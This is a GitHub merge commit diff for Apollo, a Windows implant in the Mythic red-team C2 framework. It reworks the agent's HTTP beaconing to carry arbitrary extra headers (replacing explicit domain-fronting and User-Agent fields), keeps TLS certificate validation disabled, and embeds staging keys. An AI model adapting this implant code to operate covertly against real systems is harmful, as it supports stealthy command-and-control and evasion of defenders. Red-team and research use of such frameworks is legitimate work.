Merge pull request #72 from MythicAgents/dev

Domain Fronting and Additional HTTP Variables
MythicAgents · Feb 1, 2022 · 2c8cd9d · 2c8cd9d
2 parents 1960516 + a5b7a38
commit 2c8cd9d
Show file tree

Hide file tree

Showing 3 changed files with 79 additions and 53 deletions.
diff --git a/Payload_Type/apollo/agent_code/Apollo/Config.cs b/Payload_Type/apollo/agent_code/Apollo/Config.cs
@@ -47,7 +47,7 @@ public static class Config
                         { "proxy_pass", "" },
                         { "domain_front", "domain_front" },
                         { "killdate", "-1" },
-                        { "USER_AGENT", "Apollo-Refactor" }
+                        { "USER_AGENT", "Apollo-Refactor" },
 #else
                         { "callback_interval", "callback_interval_here" },
                         { "callback_jitter", "callback_jitter_here" },
@@ -59,9 +59,8 @@ public static class Config
                         { "proxy_port", "proxy_port_here" },
                         { "proxy_user", "proxy_user_here" },
                         { "proxy_pass", "proxy_pass_here" },
-                        { "domain_front", "domain_front_here" },
                         { "killdate", "killdate_here" },
-                        { "USER_AGENT", "USER_AGENT_here" }
+                        HTTP_ADDITIONAL_HEADERS_HERE
 #endif
                     }
                 }
@@ -110,14 +109,14 @@ public static class Config
         public static Dictionary<string, C2ProfileData> IngressProfiles = new Dictionary<string, C2ProfileData>();
 #if DEBUG
 #if HTTP
-        public static string StagingRSAPrivateKey = "oEv8t0NIMnMTwa4Hvb9hkTq/T/Nt/yOv4QDXVr1fi4U=";
+        public static string StagingRSAPrivateKey = "Wuey+XA2Vlj0zngn48courSy0oJk5VQTNUmGIKZ9nkA=";
 #elif SMB
         public static string StagingRSAPrivateKey = "cnaJ2eDg1LVrR5LK/u6PkXuBjZxCnksWjy0vEFWsHIU=";
 #elif TCP
         public static string StagingRSAPrivateKey = "LbFpMoimB+aLx1pq0IqXJ1MQ4KIiGdp0LWju5jUhZRg=";
 #endif
 #if HTTP
-        public static string PayloadUUID = "3695b4c6-1fa5-49be-806f-7060b1507871";
+        public static string PayloadUUID = "704f7dac-6122-4964-aebe-1100743dffbb";
 #elif SMB
         public static string PayloadUUID = "869c4909-30eb-4a90-99b2-874dae07a0a8";
 #elif TCP

diff --git a/Payload_Type/apollo/agent_code/HttpProfile/HttpProfile.cs b/Payload_Type/apollo/agent_code/HttpProfile/HttpProfile.cs
@@ -29,12 +29,10 @@ public class HttpProfile : C2Profile, IC2Profile
         private string ProxyPort;
         private string ProxyUser;
         private string ProxyPass;
-        private string DomainFront;
         private string KillDate;
-        private string UserAgent;
         // synthesis of ProxyHost and ProxyPort
         private string ProxyAddress;
-
+        private Dictionary<string, string> _additionalHeaders = new Dictionary<string, string>();
         private bool _uuidNegotiated = false;
 
         public HttpProfile(Dictionary<string, string> data, ISerializer serializer, IAgent agent) : base(data, serializer, agent)
@@ -55,32 +53,43 @@ public HttpProfile(Dictionary<string, string> data, ISerializer serializer, IAge
             {
                 ProxyAddress = ProxyHost;
             }
-            Endpoint = string.Format("{0}:{1}/{2}", CallbackHost, CallbackPort, PostUri);
+
+            if (PostUri[0] != '/')
+            {
+                PostUri = $"/{PostUri}";
+            }
+            Endpoint = string.Format("{0}:{1}", CallbackHost, CallbackPort);
             ProxyUser = data["proxy_user"];
             ProxyPass = data["proxy_pass"];
-            DomainFront = data["domain_front"];
             KillDate = data["killdate"];
-            UserAgent = data["USER_AGENT"];
-
-            // Disable certificate validation on web requests
-            ServicePointManager.ServerCertificateValidationCallback = delegate { return true; };
-            ServicePointManager.SecurityProtocol = (SecurityProtocolType)3072 | SecurityProtocolType.Ssl3 | SecurityProtocolType.Tls;
 
-            WebRequest.DefaultWebProxy = null;
-            if (!string.IsNullOrEmpty(ProxyHost) &&
-                !string.IsNullOrEmpty(ProxyUser) &&
-                !string.IsNullOrEmpty(ProxyPass))
+            string[] reservedStrings = new[]
             {
-                try
-                {
-                    Uri host = new Uri(ProxyHost);
-                    ICredentials creds = new NetworkCredential(ProxyUser, ProxyPass);
-                    WebRequest.DefaultWebProxy = new WebProxy(host, true, null, creds);
-                } catch
+                "callback_interval",
+                "callback_jitter",
+                "callback_port",
+                "callback_host",
+                "post_uri",
+                "encrypted_exchange_check",
+                "proxy_host",
+                "proxy_port",
+                "proxy_user",
+                "proxy_pass",
+                "killdate",
+            };
+
+            foreach(string k in data.Keys)
+            {
+                if (!reservedStrings.Contains(k))
                 {
-                    WebRequest.DefaultWebProxy = null;
+                    _additionalHeaders.Add(k, data[k]);
                 }
             }
+
+            // Disable certificate validation on web requests
+            ServicePointManager.ServerCertificateValidationCallback = delegate { return true; };
+            ServicePointManager.SecurityProtocol = (SecurityProtocolType)3072 | SecurityProtocolType.Ssl3 | SecurityProtocolType.Tls;
+
             Agent.SetSleep(CallbackInterval, CallbackJitter);
         }
 
@@ -133,28 +142,34 @@ public bool Recv(MessageType mt, OnResponse<IMythicMessage> onResp)
 
         public bool SendRecv<T, TResult>(T message, OnResponse<TResult> onResponse)
         {
+            WebClient webClient = new WebClient();
+            if (!string.IsNullOrEmpty(ProxyHost) &&
+                !string.IsNullOrEmpty(ProxyUser) &&
+                !string.IsNullOrEmpty(ProxyPass))
+            {
+                webClient.Proxy = (IWebProxy) new WebProxy()
+                {
+                    Address = new Uri(ProxyAddress),
+                    Credentials = new NetworkCredential(ProxyUser, ProxyPass),
+                    UseDefaultCredentials = false,
+                    BypassProxyOnLocal = false
+                };
+            }
+
+            foreach(string k in _additionalHeaders.Keys)
+            {
+                webClient.Headers.Add(k, _additionalHeaders[k]);
+            }
+
+            webClient.BaseAddress = Endpoint;
             string sMsg = Serializer.Serialize(message);
-            byte[] requestPayload = Encoding.UTF8.GetBytes(sMsg);
-            HttpWebRequest request = (HttpWebRequest)HttpWebRequest.Create(Endpoint);
-            request.KeepAlive = false;
-            request.Method = "Post";
-            request.ContentType = "text/plain";
-            request.ContentLength = requestPayload.Length;
-            request.UserAgent = UserAgent;
-            if (DomainFront != "" && DomainFront != "domain_front")
-                request.Proxy = new WebProxy(DomainFront);
-            Stream reqStream = request.GetRequestStream();
-            reqStream.Write(requestPayload, 0, requestPayload.Length);
-            reqStream.Close();
             try
             {
-                WebResponse response = request.GetResponse();
-                using (StreamReader reader = new StreamReader(response.GetResponseStream()))
-                {
-                    onResponse(Serializer.Deserialize<TResult>(reader.ReadToEnd()));
-                }
+                var response = webClient.UploadString(PostUri, sMsg);
+                onResponse(Serializer.Deserialize<TResult>(response));
                 return true;
-            } catch
+            }
+            catch (Exception ex)
             {
                 return false;
             }

diff --git a/Payload_Type/apollo/mythic/agent_functions/builder.py b/Payload_Type/apollo/mythic/agent_functions/builder.py
@@ -14,7 +14,7 @@ class Apollo(PayloadType):
     supported_os = [
         SupportedOS.Windows
     ]
-    version = "2.0.0"
+    version = "2.0.1"
     wrapper = False
     wrapped_payloads = ["service_wrapper"]
     note = """
@@ -63,15 +63,18 @@ async def build(self) -> BuildResponse:
                 "proxy_port": "",
                 "proxy_user": "",
                 "proxy_pass": "",
-                "domain_front": "",
+                # "domain_front": "",
                 "killdate": "",
-                "USER_AGENT": "",
+                # "USER_AGENT": "",
                 "pipename": "",
                 "port": "",
                 "encrypted_exchange_check": "",
                 "payload_uuid": self.uuid,
                 "AESPSK": "",
             },
+        }
+        extra_variables = {
+
         }
         success_message = f"Apollo {self.uuid} Successfully Built"
         stdout_err = ""
@@ -87,12 +90,13 @@ async def build(self) -> BuildResponse:
                     for item in val:
                         if not isinstance(item, dict):
                             raise Exception("Expected a list of dictionaries, but got {}".format(type(item)))
-                        if item["key"] == "Host":
-                            special_files_map["Config.cs"]["domain_front"] = item["value"]
-                        elif item["key"] == "User-Agent":
-                            special_files_map["Config.cs"]["USER_AGENT"] = item["value"]
-                        else:
-                            special_files_map["Config.cs"][item["key"]] = item["value"]
+                        extra_variables[item["key"]] = item["value"]
+                        # if item["key"] == "Host":
+                        #     special_files_map["Config.cs"]["domain_front"] = item["value"]
+                        # elif item["key"] == "User-Agent":
+                        #     special_files_map["Config.cs"]["USER_AGENT"] = item["value"]
+                        # else:
+                        #     special_files_map["Config.cs"][item["key"]] = item["value"]
                 elif isinstance(val, str):
                     special_files_map["Config.cs"][key] = val
                 else:
@@ -111,6 +115,14 @@ async def build(self) -> BuildResponse:
                     if csFile.endswith(specialFile):
                         for key, val in special_files_map[specialFile].items():
                             templateFile = templateFile.replace(key + "_here", val)
+                        if specialFile == "Config.cs":
+                            if len(extra_variables.keys()) > 0:
+                                extra_data = ""
+                                for key, val in extra_variables.items():
+                                    extra_data += "                        { \"" + key + "\", \"" + val + "\" },\n"
+                                templateFile = templateFile.replace("HTTP_ADDITIONAL_HEADERS_HERE", extra_data)
+                            else:
+                                templateFile = templateFile.replace("HTTP_ADDITIONAL_HEADERS_HERE", "")
                 with open(csFile, "wb") as f:
                     f.write(templateFile.encode())
             outputType = self.get_parameter('output_type').lower()